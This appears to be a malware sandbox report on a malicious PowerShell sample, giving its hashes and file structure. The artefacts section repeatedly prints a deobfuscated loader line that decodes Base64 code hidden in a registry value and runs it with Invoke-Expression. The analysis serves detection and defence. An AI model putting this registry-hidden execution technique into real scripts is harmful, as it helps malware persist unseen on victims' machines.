Malicious
Malicious

ad88c51e409c563ca0886c9913250978

PowerShell
|
MD5: ad88c51e409c563ca0886c9913250978
|
Size: 7.79 KB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
ad88c51e409c563ca0886c9913250978
Sha1
ff88268e3c48cedad7590af211b9f9e875b1f45c
Sha256
1ae3af7517c66182b3ca64e025c4b9b74add830a7a2fc06c41914c6df17581f9
Sha384
29703fbbc078d40ebca08906b45d4b032080da7ca82ee654ce79be35aa7c82a70711e1eb5a6a3d31f4fcc87734f0cde9
Sha512
63f23ffc5c1a7f1caee6368e1904c328f5938bd827f27542da950774070bfc17a2397746e7acaac866e10a0a5592b299c83c82c29a4bc205e89cf21519c12335
SSDeep
192:X40np3Ih8ySzJWt6PFCHMzG3gyLiiKGw0DJGMLtg98:24JYsCHQWq8
TLSH
B0F1EA29DA50929E4363327D08996C09B2DE812FC3612E54F51CB4F0AF8516DCFB4BF6
File Structure
ad88c51e409c563ca0886c9913250978
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_OjRYuU") | Select-Object -ExpandProperty "#shadow_OjRYuU"))))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_OjRYuU") | Select-Object -ExpandProperty "#shadow_OjRYuU"))))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_CqDSyW") | Select-Object -ExpandProperty "#shadow_CqDSyW"))))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_CqDSyW") | Select-Object -ExpandProperty "#shadow_CqDSyW"))))
ad88c51e409c563ca0886c9913250978 (7.79 KB)
File Structure
ad88c51e409c563ca0886c9913250978
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_OjRYuU") | Select-Object -ExpandProperty "#shadow_OjRYuU"))))

Malicious

ad88c51e409c563ca0886c9913250978 > [Base64-Block]
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_OjRYuU") | Select-Object -ExpandProperty "#shadow_OjRYuU"))))

Malicious

ad88c51e409c563ca0886c9913250978 > [Base64-Block] > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_CqDSyW") | Select-Object -ExpandProperty "#shadow_CqDSyW"))))

Malicious

ad88c51e409c563ca0886c9913250978 > [Base64-Block]
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_CqDSyW") | Select-Object -ExpandProperty "#shadow_CqDSyW"))))

Malicious

ad88c51e409c563ca0886c9913250978 > [Base64-Block] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙